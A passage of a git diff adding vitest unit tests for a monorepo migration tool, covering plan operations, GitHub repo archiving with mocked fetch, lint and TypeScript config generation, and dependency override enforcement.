fs.ensureDir(existingPkg); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeJson(path.join(existingPkg, 'package.json'), { + name: 'lodash', + version: '5.0.0', + }); + + const logger = mockLogger(); + const plan = await generateAddPlan( + path.join(__dirname, '../../../tests/fixtures/repo-a'), + { to: monorepoDir, packagesDir: 'packages' }, + logger, + ); + + // repo-a depends on lodash, and there's a package named lodash + expect(plan.analysis.crossDependencies.length).toBeGreaterThanOrEqual(1); + expect(plan.analysis.crossDependencies[0].toPackage).toBe('lodash'); + }); + }); + + describe('applyAddPlan', () => { + it('should execute copy operation', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + const sourceDir = path.join(tempDir, 'source'); + await fs.ensureDir(monorepoDir); + await fs.ensureDir(sourceDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeFile(path.join(sourceDir, 'index.ts'), 'export const x = 1;'); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: sourceDir, resolved: sourceDir, name: 'my-lib' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'copy-package', + type: 'copy', + description: 'Copy my-lib to packages/my-lib', + inputs: [sourceDir], + outputs: ['packages/my-lib'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + expect(result.success).toBe(true); + expect(await fs.pathExists(path.join(monorepoDir, 'packages/my-lib/index.ts'))).toBe(true); + }); + + it('should execute write operation to update workspaces', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/existing'], + }); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'new-pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json', + inputs: ['package.json'], + outputs: ['package.json'], + }, + ], + }; + + const logger = mockLogger(); + await applyAddPlan(plan, logger); + + const rootPkg = await fs.readJson(path.join(monorepoDir, 'package.json')); + expect(rootPkg.workspaces).toContain('packages/new-pkg'); + expect(rootPkg.workspaces).toContain('packages/existing'); + }); + + it('should not duplicate workspace entries', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/existing', 'packages/my-pkg'], + }); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'my-pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json', + inputs: ['package.json'], + outputs: ['package.json'], + }, + ], + }; + + const logger = mockLogger(); + await applyAddPlan(plan, logger); + + const rootPkg = await fs.readJson(path.join(monorepoDir, 'package.json')); + const matches = rootPkg.workspaces.filter((w: string) => w === 'packages/my-pkg'); + expect(matches).toHaveLength(1); + }); + + it('should handle exec operation by skipping', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'install-deps', + type: 'exec', + description: 'Install dependencies', + inputs: [], + outputs: ['node_modules'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + expect(result.success).toBe(true); + expect(logger.info).toHaveBeenCalledWith(expect.stringContaining('Skipping install')); + }); + + it('should handle copy operation with no inputs gracefully', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + await fs.ensureDir(monorepoDir); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: '/tmp/src', resolved: '/tmp/src', name: 'pkg' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'copy-package', + type: 'copy', + description: 'Copy pkg to packages/pkg', + inputs: [], + outputs: ['packages/pkg'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + expect(result.success).toBe(true); + }); + + it('should execute multiple operations in sequence', async () => { + const monorepoDir = path.join(tempDir, 'monorepo'); + const sourceDir = path.join(tempDir, 'source'); + await fs.ensureDir(monorepoDir); + await fs.ensureDir(sourceDir); + await fs.writeJson(path.join(monorepoDir, 'package.json'), { + name: 'monorepo', + workspaces: ['packages/*'], + }); + await fs.writeFile(path.join(sourceDir, 'lib.ts'), 'export default {};'); + + const plan: AddPlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + sourceRepo: { type: 'local', original: sourceDir, resolved: sourceDir, name: 'lib' }, + targetMonorepo: monorepoDir, + packagesDir: 'packages', + analysis: { + packages: [], + conflicts: [], + collisions: [], + crossDependencies: [], + complexityScore: 0, + recommendations: [], + }, + decisions: [], + operations: [ + { + id: 'copy-package', + type: 'copy', + description: 'Copy lib to packages/lib', + inputs: [sourceDir], + outputs: ['packages/lib'], + }, + { + id: 'update-root-pkg', + type: 'write', + description: 'Update root package.json', + inputs: ['package.json'], + outputs: ['package.json'], + }, + { + id: 'install-deps', + type: 'exec', + description: 'Install dependencies', + inputs: [], + outputs: ['node_modules'], + }, + ], + }; + + const logger = mockLogger(); + const result = await applyAddPlan(plan, logger); + + expect(result.success).toBe(true); + expect(result.packageDir).toBe(path.join(monorepoDir, 'packages/lib')); + expect(await fs.pathExists(path.join(monorepoDir, 'packages/lib/lib.ts'))).toBe(true); + }); + }); +}); diff --git a/tests/unit/strategies/archive.test.ts b/tests/unit/strategies/archive.test.ts new file mode 100644 index 0000000..f1eb356 --- /dev/null +++ b/tests/unit/strategies/archive.test.ts @@ -0,0 +1,254 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { + generateReadmeDeprecationPatch, + generateArchivePlan, + applyArchiveViaGitHubApi, +} from '../../../src/strategies/archive.js'; +import type { ArchivePlan, Logger } from '../../../src/types/index.js'; + +function mockLogger(): Logger { + return { + info: vi.fn(), + success: vi.fn(), + warn: vi.fn(), + error: vi.fn(), + debug: vi.fn(), + log: vi.fn(), + }; +} + +describe('archive strategy', () => { + describe('generateReadmeDeprecationPatch', () => { + it('should generate a unified diff format', () => { + const patch = generateReadmeDeprecationPatch('my-lib', 'https://github.com/org/monorepo'); + expect(patch).toContain('--- a/README.md'); + expect(patch).toContain('+++ b/README.md'); + expect(patch).toContain('@@'); + }); + + it('should include the repo name as heading', () => { + const patch = generateReadmeDeprecationPatch('my-lib', 'https://github.com/org/monorepo'); + expect(patch).toContain('+# my-lib'); + }); + + it('should include monorepo URL', () => { + const patch = generateReadmeDeprecationPatch('pkg', 'https://github.com/org/mono'); + expect(patch).toContain('https://github.com/org/mono'); + }); + + it('should include migration notice', () => { + const patch = generateReadmeDeprecationPatch('pkg', 'https://example.com/mono'); + expect(patch).toContain('archived'); + expect(patch).toContain('no longer maintained'); + }); + + it('should include instructions to file issues elsewhere', () => { + const patch = generateReadmeDeprecationPatch('pkg', 'https://example.com/mono'); + expect(patch).toContain('file issues'); + expect(patch).toContain('pull requests'); + }); + }); + + describe('generateArchivePlan', () => { + it('should generate a plan for local fixture repos', async () => { + const fixtureA = 'tests/fixtures/repo-a'; + const fixtureB = 'tests/fixtures/repo-b'; + const plan = await generateArchivePlan( + [fixtureA, fixtureB], + 'https://github.com/org/monorepo', + ); + + expect(plan.schemaVersion).toBe(1); + expect(plan.createdAt).toBeTruthy(); + expect(plan.monorepoUrl).toBe('https://github.com/org/monorepo'); + expect(plan.repos).toHaveLength(2); + expect(plan.repos[0].readmePatch).toContain('--- a/README.md'); + expect(plan.repos[1].readmePatch).toContain('--- a/README.md'); + }); + + it('should not include apiOperations by default', async () => { + const plan = await generateArchivePlan( + ['tests/fixtures/repo-a'], + 'https://github.com/org/monorepo', + ); + expect(plan.apiOperations).toBeUndefined(); + }); + + it('should include apiOperations when tokenFromEnv is true', async () => { + const plan = await generateArchivePlan( + ['tests/fixtures/repo-a'], + 'https://github.com/org/monorepo', + { tokenFromEnv: true }, + ); + expect(plan.apiOperations).toBeDefined(); + expect(plan.apiOperations!.length).toBeGreaterThan(0); + expect(plan.apiOperations![0].action).toBe('archive'); + }); + + it('should throw on invalid repo sources', async () => { + await expect( + generateArchivePlan([], 'https://github.com/org/monorepo'), + ).rejects.toThrow(); + }); + }); + + describe('applyArchiveViaGitHubApi', () => { + const originalEnv = process.env; + let logger: Logger; + + beforeEach(() => { + logger = mockLogger(); + process.env = { ...originalEnv }; + }); + + afterEach(() => { + process.env = originalEnv; + vi.restoreAllMocks(); + }); + + it('should throw when no GitHub token is set', async () => { + delete process.env.GITHUB_TOKEN; + delete process.env.GH_TOKEN; + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'org/my-lib', action: 'archive' }], + }; + + await expect(applyArchiveViaGitHubApi(plan, logger)).rejects.toThrow('GitHub token required'); + }); + + it('should handle plan with no apiOperations gracefully', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.applied).toEqual([]); + expect(result.failed).toEqual([]); + }); + + it('should fail for repos that cannot be parsed', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'invalid-format', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.failed).toHaveLength(1); + expect(result.failed[0].error).toContain('Could not parse'); + }); + + it('should handle fetch failures gracefully', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + // Mock fetch to simulate network error + const originalFetch = globalThis.fetch; + globalThis.fetch = vi.fn().mockRejectedValue(new Error('Network error')); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.failed).toHaveLength(1); + expect(result.failed[0].error).toContain('Network error'); + + globalThis.fetch = originalFetch; + }); + + it('should handle HTTP error responses', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const originalFetch = globalThis.fetch; + globalThis.fetch = vi.fn().mockResolvedValue({ + ok: false, + status: 403, + text: () => Promise.resolve('Forbidden'), + }); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.failed).toHaveLength(1); + expect(result.failed[0].error).toContain('HTTP 403'); + + globalThis.fetch = originalFetch; + }); + + it('should succeed with successful API response', async () => { + process.env.GITHUB_TOKEN = 'fake-token'; + + const originalFetch = globalThis.fetch; + globalThis.fetch = vi.fn().mockResolvedValue({ + ok: true, + status: 200, + }); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + const result = await applyArchiveViaGitHubApi(plan, logger); + expect(result.applied).toEqual(['github.com/org/my-lib']); + expect(result.failed).toEqual([]); + + globalThis.fetch = originalFetch; + }); + + it('should use GH_TOKEN when GITHUB_TOKEN is not set', async () => { + delete process.env.GITHUB_TOKEN; + process.env.GH_TOKEN = 'gh-token'; + + const originalFetch = globalThis.fetch; + globalThis.fetch = vi.fn().mockResolvedValue({ ok: true, status: 200 }); + + const plan: ArchivePlan = { + schemaVersion: 1, + createdAt: new Date().toISOString(), + repos: [], + monorepoUrl: 'https://github.com/org/mono', + apiOperations: [{ repo: 'github.com/org/my-lib', action: 'archive' }], + }; + + await applyArchiveViaGitHubApi(plan, logger); + expect(globalThis.fetch).toHaveBeenCalledWith( + expect.stringContaining('api.github.com'), + expect.objectContaining({ + headers: expect.objectContaining({ + Authorization: 'Bearer gh-token', + }), + }), + ); + + globalThis.fetch = originalFetch; + }); + }); +}); diff --git a/tests/unit/strategies/configure.test.ts b/tests/unit/strategies/configure.test.ts new file mode 100755 index 0000000..bee5289 --- /dev/null +++ b/tests/unit/strategies/configure.test.ts @@ -0,0 +1,281 @@ +import path from 'node:path'; +import fs from 'fs-extra'; +import { describe, it, expect, afterEach } from 'vitest'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { createMockLogger } from '../../helpers/mocks.js'; +import { generateConfigPlan, applyConfigPlan } from '../../../src/strategies/configure.js'; + +afterEach(async () => { + await cleanupFixtures(); +}); + +describe('Configure Engine', () => { + describe('generateConfigPlan', () => { + it('with no existing configs should generate Prettier, ESLint, and .prettierignore patches', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-no-configs', + packageJson: { name: 'my-monorepo', private: true }, + directories: ['packages/pkg-a', 'packages/pkg-b'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a', 'pkg-b'], + 'packages', + ); + + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).toContain('.prettierrc.json'); + expect(patchPaths).toContain('.prettierignore'); + expect(patchPaths).toContain('.eslintrc.json'); + expect(plan.warnings).toHaveLength(0); + + // Verify Prettier content is valid JSON with expected keys + const prettierPatch = plan.patches.find((p) => p.path === '.prettierrc.json')!; + const prettierConfig = JSON.parse(prettierPatch.after); + expect(prettierConfig).toHaveProperty('singleQuote', true); + expect(prettierConfig).toHaveProperty('semi', true); + + // Verify ESLint content + const eslintPatch = plan.patches.find((p) => p.path === '.eslintrc.json')!; + const eslintConfig = JSON.parse(eslintPatch.after); + expect(eslintConfig).toHaveProperty('root', true); + + // Verify .prettierignore content + const ignorePatch = plan.patches.find((p) => p.path === '.prettierignore')!; + expect(ignorePatch.after).toContain('node_modules'); + expect(ignorePatch.after).toContain('dist'); + }); + + it('with existing .prettierrc.json should NOT generate Prettier patch', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-has-prettier', + packageJson: { name: 'my-monorepo', private: true }, + files: { + '.prettierrc.json': JSON.stringify({ semi: false }), + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).not.toContain('.prettierrc.json'); + // .prettierignore should still be generated since it doesn't exist + expect(patchPaths).toContain('.prettierignore'); + // ESLint should still be generated + expect(patchPaths).toContain('.eslintrc.json'); + }); + + it('with .eslintrc.js should produce a warning instead of a patch', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-eslint-js', + packageJson: { name: 'my-monorepo', private: true }, + files: { + '.eslintrc.js': 'module.exports = { root: true };', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + // Should NOT generate an ESLint JSON patch + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).not.toContain('.eslintrc.json'); + + // Should produce a warning about the JS config + expect(plan.warnings.length).toBeGreaterThanOrEqual(1); + const eslintWarning = plan.warnings.find((w) => w.config.includes('ESLint')); + expect(eslintWarning).toBeDefined(); + expect(eslintWarning!.reason).toContain('Executable config file'); + expect(eslintWarning!.suggestion).toContain('review'); + }); + + it('with TypeScript packages should generate root tsconfig with references and per-package composite patches', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-typescript', + packageJson: { name: 'my-monorepo', private: true }, + files: { + 'packages/pkg-a/tsconfig.json': JSON.stringify({ + compilerOptions: { target: 'ES2020', strict: true }, + }), + 'packages/pkg-b/tsconfig.json': JSON.stringify({ + compilerOptions: { target: 'ES2022' }, + }), + }, + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a', 'pkg-b'], + 'packages', + ); + + const patchPaths = plan.patches.map((p) => p.path); + + // Should generate root tsconfig.json + expect(patchPaths).toContain('tsconfig.json'); + const rootTsPatch = plan.patches.find((p) => p.path === 'tsconfig.json')!; + const rootTsConfig = JSON.parse(rootTsPatch.after); + expect(rootTsConfig.references).toEqual([ + { path: './packages/pkg-a' }, + { path: './packages/pkg-b' }, + ]); + expect(rootTsConfig.compilerOptions.composite).toBe(true); + + // Should generate per-package composite patches + expect(patchPaths).toContain('packages/pkg-a/tsconfig.json'); + expect(patchPaths).toContain('packages/pkg-b/tsconfig.json'); + + const pkgAPatch = plan.patches.find((p) => p.path === 'packages/pkg-a/tsconfig.json')!; + const pkgAConfig = JSON.parse(pkgAPatch.after); + expect(pkgAConfig.compilerOptions.composite).toBe(true); + // Should preserve existing compiler options + expect(pkgAConfig.compilerOptions.target).toBe('ES2020'); + expect(pkgAConfig.compilerOptions.strict).toBe(true); + + // Should have a before field (existing content) + expect(pkgAPatch.before).toBeDefined(); + }); + + it('should warn about per-package JS eslint config', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-pkg-eslint-js', + packageJson: { name: 'my-monorepo', private: true }, + files: { + 'packages/pkg-a/eslint.config.js': 'export default {};', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + const pkgWarning = plan.warnings.find( + (w) => w.config.includes('pkg-a') && w.config.includes('ESLint'), + ); + expect(pkgWarning).toBeDefined(); + expect(pkgWarning!.reason).toContain('manual review'); + }); + + it('should handle unparseable per-package tsconfig gracefully', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-bad-tsconfig', + packageJson: { name: 'my-monorepo', private: true }, + files: { + 'packages/pkg-a/tsconfig.json': 'not valid json{{{', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + // Should not crash, should still generate root tsconfig + const patchPaths = plan.patches.map((p) => p.path); + expect(patchPaths).toContain('tsconfig.json'); + // But should NOT generate a per-package tsconfig patch for the bad one + expect(patchPaths).not.toContain('packages/pkg-a/tsconfig.json'); + }); + + it('should log summary when logger is provided', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-logger', + packageJson: { name: 'my-monorepo', private: true }, + directories: ['packages/pkg-a'], + }); + + const logger = createMockLogger(); + + await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + {}, + logger, + ); + + expect(logger.info).toHaveBeenCalledWith( + expect.stringContaining('ConfigPlan'), + ); + }); + }); + + describe('applyConfigPlan', () => { + it('should write files to disk', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-apply', + packageJson: { name: 'my-monorepo', private: true }, + directories: ['packages/pkg-a'], + }); + + // First generate a plan + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + // Then apply it + const logger = createMockLogger(); + await applyConfigPlan(plan, monorepoDir, logger); + + // Verify files were written to disk + const prettierExists = await fs.pathExists(path.join(monorepoDir, '.prettierrc.json')); + expect(prettierExists).toBe(true); + + const eslintExists = await fs.pathExists(path.join(monorepoDir, '.eslintrc.json')); + expect(eslintExists).toBe(true); + + const ignoreExists = await fs.pathExists(path.join(monorepoDir, '.prettierignore')); + expect(ignoreExists).toBe(true); + + // Verify content is correct + const prettierContent = await fs.readFile(path.join(monorepoDir, '.prettierrc.json'), 'utf-8'); + const prettierConfig = JSON.parse(prettierContent); + expect(prettierConfig).toHaveProperty('singleQuote', true); + + // Verify logger was called for each patch + expect(logger.info).toHaveBeenCalledWith(expect.stringContaining('Wrote')); + }); + + it('should log warnings from the plan', async () => { + const monorepoDir = await createTempFixture({ + name: 'cfg-apply-warn', + packageJson: { name: 'my-monorepo', private: true }, + files: { + '.eslintrc.js': 'module.exports = { root: true };', + }, + directories: ['packages/pkg-a'], + }); + + const plan = await generateConfigPlan( + monorepoDir, + ['pkg-a'], + 'packages', + ); + + expect(plan.warnings.length).toBeGreaterThan(0); + + const logger = createMockLogger(); + await applyConfigPlan(plan, monorepoDir, logger); + + // Warnings should be logged + expect(logger.warn).toHaveBeenCalled(); + }); + }); +}); diff --git a/tests/unit/strategies/dependency-enforcement.test.ts b/tests/unit/strategies/dependency-enforcement.test.ts new file mode 100755 index 0000000..37672dd --- /dev/null +++ b/tests/unit/strategies/dependency-enforcement.test.ts @@ -0,0 +1,365 @@ +import { describe, it, expect, afterEach } from 'vitest'; +import { createTempFixture, cleanupFixtures } from '../../helpers/fixtures.js'; +import { + generateOverrides, + getOverridesKey, + normalizeToWorkspaceProtocol, + applyOverridesToPackageJson, + verifyEnforcement, +} from '../../../src/strategies/dependency-enforcement.js'; +import type { + DependencyConflict, + PlanDecision, + PackageInfo, + PackageManagerType, +} from '../../../src/types/index.js'; + +const createPackageInfo = ( + name: string, + overrides: Partial = {}, +): PackageInfo => ({ + name, + version: '1.0.0', + dependencies: {}, + devDependencies: {}, + peerDependencies: {}, + scripts: {}, + path: `/packages/${name}`, + repoName: name, + ...overrides, +}); + +describe('Dependency Enforcement', () => { + afterEach(async () => { + await cleanupFixtures(); + }); + + describe('generateOverrides', () => { + it('should produce correct overrides from conflicts and decisions', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'lodash', + versions: [ + { version: '^4.17.20', source: 'repo-a', type: 'dependencies' }, + { version: '^4.17.21', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'minor', + }, + { + name: 'react', + versions: [ + { version: '^17.0.0', source: 'repo-a', type: 'dependencies' }, + { version: '^18.0.0', source: 'repo-b', type: 'dependencies' }, + ], + severity: 'major', + }, + ]; + + const decisions: PlanDecision[] = [ + { + id: 'dep-lodash', + kind: 'version-conflict', + chosen: '^4.17.21', + alternatives: ['^4.17.20'], + }, + { + id: 'dep-react', + kind: 'version-conflict', + chosen: '^18.0.0', + alternatives: ['^17.0.0'], + }, + ]; + + const result = generateOverrides(conflicts, decisions, 'pnpm'); + + expect(result).toEqual({ + lodash: '^4.17.21', + react: '^18.0.0', + }); + }); + + it('should fall back to the first version when no decision matches', () => { + const conflicts: DependencyConflict[] = [ + { + name: 'typescript', + versions: [ + { version: '^5.0.0', source: 'repo-a', type: 'devDependencies' }, + { version: '^4.9.0', source: 'repo-b', type: 'devDependencies' }, + ], + severity: 'major', + }, + ]; + + const decisions: PlanDecision[] = [ + { + id: 'dep-unrelated', + kind: 'version-conflict', + chosen: '^1.0.0', + alternatives: [], + }, + ]; + + const result = generateOverrides(conflicts, decisions, 'npm'); + + expect(result).toEqual({ + typescript: '^5.0.0', + }); + }); + }); + + describe('getOverridesKey', () => { + it('should return pnpm.overrides for pnpm', () => { + expect(getOverridesKey('pnpm')).toBe('pnpm.overrides'); + }); + + it('should return resolutions for yarn', () => { + expect(getOverridesKey('yarn')).toBe('resolutions'); + }); + + it('should return resolutions for yarn-berry', () => { + expect(getOverridesKey('yarn-berry')).toBe('resolutions'); + }); + + it('should return overrides for npm', () => { + expect(getOverridesKey('npm')).toBe('overrides'); + }); + }); + + describe('normalizeToWorkspaceProtocol', () => { + it('should generate update entries with workspace protocol for internal deps', () => { + const packages: PackageInfo[] = [ + createPackageInfo('pkg-a', { + dependencies: { 'pkg-b': '^1.0.0' }, + }), + createPackageInfo('pkg-b', { + dependencies: { lodash: '^4.17.21' }, + }), + ]; + + const updates = normalizeToWorkspaceProtocol({}, packages, 'workspace:*'); + + expect(updates).toEqual([ + { + packageName: 'pkg-a', + dependency: 'pkg-b', + from: '^1.0.0', + to: 'workspace:*', + }, + ]); + }); + + it('should skip dependencies already using workspace protocol', () => { + const packages: PackageInfo[] = [ + createPackageInfo('pkg-a', { + dependencies: { 'pkg-b': 'workspace:*' }, + }), + createPackageInfo('pkg-b'), + ]; + + const updates = normalizeToWorkspaceProtocol({}, packages, 'workspace:*'); + + expect(updates).toEqual([]); + }); + }); + + describe('applyOverridesToPackageJson', () => { + it('should nest overrides under pnpm.overrides for pnpm', () => { + const rootPkgJson = { name: 'monorepo', version: '1.0.0' }; + const overrides = { lodash: '^4.17.21' }; + + const result = applyOverridesToPackageJson(rootPkgJson, overrides, 'pnpm'); + + expect(result.pnpm).toEqual({ overrides: { lodash: '^4.17.21' } }); + }); + + it('should place overrides at top level for npm', () => { + const rootPkgJson = { name: 'monorepo', version: '1.0.0' }; + const overrides = { react: '^18.0.0' }; + + const result = applyOverridesToPackageJson(rootPkgJson, overrides, 'npm'); + + expect(result.overrides).toEqual({ react: '^18.0.0' }); + expect(result).not.toHaveProperty('pnpm'); + }); + + it('should place resolutions at top level for yarn', () => { + const rootPkgJson = { name: 'monorepo', version: '1.0.0' }; + const overrides = { react: '^18.0.0' }; + + const result = applyOverridesToPackageJson(rootPkgJson, overrides, 'yarn'); + + expect(result.resolutions).toEqual({ react: '^18.0.0' }); + }); + }); + + describe('verifyEnforcement', () => { + it('should return a pass check when pnpm overrides are present', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-pass', + packageJson: { + name: 'monorepo', + version: '1.0.0', + pnpm: { + overrides: { + lodash: '^4.17.21', + }, + }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('pass'); + expect(checks[0].id).toBe('enforcement-overrides-present'); + }); + + it('should return a warn check when overrides are missing', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-warn', + packageJson: { + name: 'monorepo', + version: '1.0.0', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + expect(checks[0].id).toBe('enforcement-overrides-missing'); + }); + + it('should return a fail check when no root package.json exists', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-fail', + files: { + 'src/index.ts': 'export const x = 1;', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('fail'); + expect(checks[0].id).toBe('enforcement-no-root-pkg'); + }); + + it('should return pass when npm overrides are present', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-npm-pass', + packageJson: { + name: 'monorepo', + version: '1.0.0', + overrides: { + lodash: '^4.17.21', + }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'npm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('pass'); + expect(checks[0].message).toContain('overrides'); + }); + + it('should return warn when npm overrides are missing', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-npm-warn', + packageJson: { + name: 'monorepo', + version: '1.0.0', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'npm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + expect(checks[0].id).toBe('enforcement-overrides-missing'); + }); + + it('should return pass when yarn resolutions are present', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-yarn-pass', + packageJson: { + name: 'monorepo', + version: '1.0.0', + resolutions: { + react: '^18.0.0', + }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'yarn'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('pass'); + expect(checks[0].message).toContain('resolutions'); + }); + + it('should return warn when yarn resolutions are missing', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-yarn-warn', + packageJson: { + name: 'monorepo', + version: '1.0.0', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'yarn'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + expect(checks[0].details).toContain('resolutions'); + }); + + it('should return warn when pnpm overrides object is empty', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-empty-overrides', + packageJson: { + name: 'monorepo', + version: '1.0.0', + pnpm: { overrides: {} }, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + }); + + it('should return warn when npm overrides object is empty', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-npm-empty', + packageJson: { + name: 'monorepo', + version: '1.0.0', + overrides: {}, + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'npm'); + + expect(checks).toHaveLength(1); + expect(checks[0].status).toBe('warn'); + }); + + it('should handle malformed package.json gracefully', async () => { + const fixturePath = await createTempFixture({ + name: 'enforcement-malformed', + files: { + 'package.json': '{ invalid json !!!', + }, + }); + + const checks = await verifyEnforcement(fixturePath, 'pnpm'); + 